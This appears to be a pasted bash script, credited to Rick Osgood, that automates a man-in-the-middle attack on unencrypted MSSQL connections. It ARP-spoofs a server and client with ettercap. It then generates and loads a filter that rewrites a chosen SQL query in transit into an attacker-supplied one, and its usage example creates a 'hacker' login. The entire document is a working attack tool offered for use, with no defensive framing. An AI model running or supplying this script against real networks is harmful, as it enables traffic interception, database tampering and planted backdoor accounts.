SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/bash | |
2 | # | |
3 | #################################################################### | |
4 | # | |
5 | # Written by Rick Osgood | |
6 | # | |
7 | # This script is designed to automate the process of hijacking an | |
8 | # MSSQL database connection. This script can be used to perform a | |
9 | # MITM attack between two IP addresses using ettercap and ARP | |
10 | # spoofing. You also submit an original SQL query and a new SQL | |
11 | # query. The script will create, compile, and load an ettercap | |
12 | # filter to replace the original SQL string with your new one. | |
13 | # This should work on any MSSQL conncetion that is not encrypted. | |
14 | # | |
15 | #################################################################### | |
16 | ||
17 | args=("$@") #array to store command line arguments | |
18 | ||
19 | # Set variable defalts | |
20 | SqlPort=1433 | |
21 | ServerIP="NULL" | |
22 | ClientIP="NULL" | |
23 | FileName="NULL" | |
24 | ||
25 | # Help function | |
26 | print_help(){ | |
27 | echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] | |
28 | -c [SQL Client IP]" | |
29 | echo "" | |
30 | echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L | |
31 | OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100" | |
32 | echo "" | |
33 | echo "This script creates an ettercap filter that will identify a SQL string" | |
34 | echo "and replace it with a new string. The script will then compile the filter" | |
35 | echo "and run ettercap with the filter loaded. Ettercap will perform an ARP" | |
36 | echo "spoofing attack against the specified IP addresses automatically. All you" | |
37 | echo "have to do is sit back and wait for the original query to be submitted." | |
38 | echo "" | |
39 | echo " --help" | |
40 | echo " Show this message." | |
41 | echo " -o" | |
42 | echo " Specify the original SQL string to be replaced." | |
43 | echo " -i" | |
44 | echo " Specify the new SQL string to be injected. This string must not" | |
45 | echo " longer than the original query string." | |
46 | echo " -s" | |
47 | echo " Specify the MSSQL server IP for ARP poison attack. May also use gateway IP" | |
48 | echo " -c" | |
49 | echo " Specify the SQL cient IP for ARP poison attack." | |
50 | echo " -f" | |
51 | echo " Specify the output filename for the ettercap filter." | |
52 | echo " -p" | |
53 | echo " Optional. Specifiy the MSSQL traffic port. Defaults to 1433." | |
54 | } | |
55 | ||
56 | # If not enough arguments then quit | |
57 | if [ $# -lt "4" ]; then | |
58 | print_help | |
59 | exit 1 | |
60 | fi | |
61 | ||
62 | COUNTER=0 #Count from zero to number of arguments | |
63 | while [ $COUNTER -lt $# ]; do | |
64 | if [ "${args[$COUNTER]}" == "--help" ]; then | |
65 | print_help | |
66 | exit 0 | |
67 | ||
68 | elif [ "${args[$COUNTER]}" == "-o" ]; then | |
69 | COUNTER=$(($COUNTER+1)) | |
70 | OldQuery=${args[$COUNTER]} | |
71 | ||
72 | elif [ "${args[$COUNTER]}" == "-i" ]; then | |
73 | COUNTER=$((COUNTER+1)) | |
74 | NewQuery=${args[$COUNTER]} | |
75 | ||
76 | elif [ "${args[$COUNTER]}" == "-s" ]; then | |
77 | COUNTER=$((COUNTER+1)) | |
78 | ServerIP=${args[$COUNTER]} | |
79 | ||
80 | elif [ "${args[$COUNTER]}" == "-c" ]; then | |
81 | COUNTER=$((COUNTER+1)) | |
82 | ClientIP=${args[$COUNTER]} | |
83 | ||
84 | elif [ "${args[$COUNTER]}" == "-f" ]; then | |
85 | COUNTER=$((COUNTER+1)) | |
86 | FileName=${args[$COUNTER]} | |
87 | ||
88 | elif [ "${args[$COUNTER]}" == "-p" ]; then | |
89 | COUNTER=$((COUNTER+1)) | |
90 | SqlPort=${args[$COUNTER]} | |
91 | ||
92 | else | |
93 | echo "Error: Unknown argument \"${args[$COUNTER]}\"" | |
94 | echo "" | |
95 | print_help | |
96 | exit 1 | |
97 | fi | |
98 | ||
99 | COUNTER=$(($COUNTER+1)) | |
100 | done; | |
101 | ||
102 | # Is anything missing? | |
103 | if [ "$ServerIP" == "NULL" ]; then | |
104 | echo "You must specify server IP!" | |
105 | exit 1 | |
106 | ||
107 | elif [ "$ClientIP" == "NULL" ]; then | |
108 | echo "You must specify client IP!" | |
109 | exit 1 | |
110 | ||
111 | elif [ "$FileName" == "NULL" ]; then | |
112 | echo "You must specify the file name for the ettercap filter!" | |
113 | exit 1 | |
114 | fi | |
115 | ||
116 | # Calculate length of injected SQL query | |
117 | length2=`echo $NewQuery | wc -m` | |
118 | length2=$((length2 - 1)) | |
119 | echo "New string is $length2 bytes" | |
120 | ||
121 | # Calculate length of original SQL query | |
122 | length1=`echo $OldQuery | wc -m` | |
123 | length1=$((length1 - 1)) | |
124 | echo "Original string is $length1 bytes" | |
125 | ||
126 | # What's the difference? | |
127 | difference=$((length1 - length2)) | |
128 | echo "Difference is $difference bytes" | |
129 | ||
130 | # If the new string is too long it won't work | |
131 | if [ $difference -lt 0 ]; then | |
132 | echo "" | |
133 | echo "New SQL query is longer than original! Quitting..." | |
134 | exit 0 | |
135 | fi | |
136 | ||
137 | temp="" | |
138 | for i in `seq 1 $difference`; | |
139 | do | |
140 | temp="$temp " | |
141 | done | |
142 | PaddedQuery="$NewQuery$temp" | |
143 | echo "PaddedQuery is \"$PaddedQuery\"" | |
144 | echo "" | |
145 | ||
146 | IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces | |
147 | ||
148 | echo "Converting original query to hex..." | |
149 | # Convert original query to hex string with NULL padding (How it appears over the wire) | |
150 | OldQueryHex="" | |
151 | for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g') | |
152 | do | |
153 | OldQueryHex="$OldQueryHex\x" | |
154 | temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}` | |
155 | OldQueryHex="$OldQueryHex$temp" | |
156 | OldQueryHex="$OldQueryHex\x00" | |
157 | done | |
158 | ||
159 | echo "Converting new query to hex..." | |
160 | # Convert new query to hex string now. | |
161 | NewQueryHex="" | |
162 | for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g') | |
163 | do | |
164 | NewQueryHex="$NewQueryHex\x" | |
165 | temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}` | |
166 | NewQueryHex="$NewQueryHex$temp" | |
167 | NewQueryHex="$NewQueryHex\x00" | |
168 | done | |
169 | ||
170 | echo "Writing ettercap filter now..." | |
171 | ||
172 | # Start writing actual ettercap filter file | |
173 | echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName | |
174 | echo " msg(\"SQL traffic discovered\");" >> $FileName | |
175 | echo " if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName | |
176 | echo " msg(\"Found our string!\");" >> $FileName | |
177 | echo " replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName | |
178 | echo " msg(\"...and replaced it :)\");" >> $FileName | |
179 | echo " }" >> $FileName | |
180 | echo "}" >> $FileName | |
181 | ||
182 | # Exeute etterfilter to create the compiled filter | |
183 | etterfilter $FileName -o $FileName.ef | |
184 | ||
185 | # Execute ettercap and load the filter | |
186 | ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP// | |
187 | ||
188 | echo "" | |
189 | echo "Completed Successfully!" |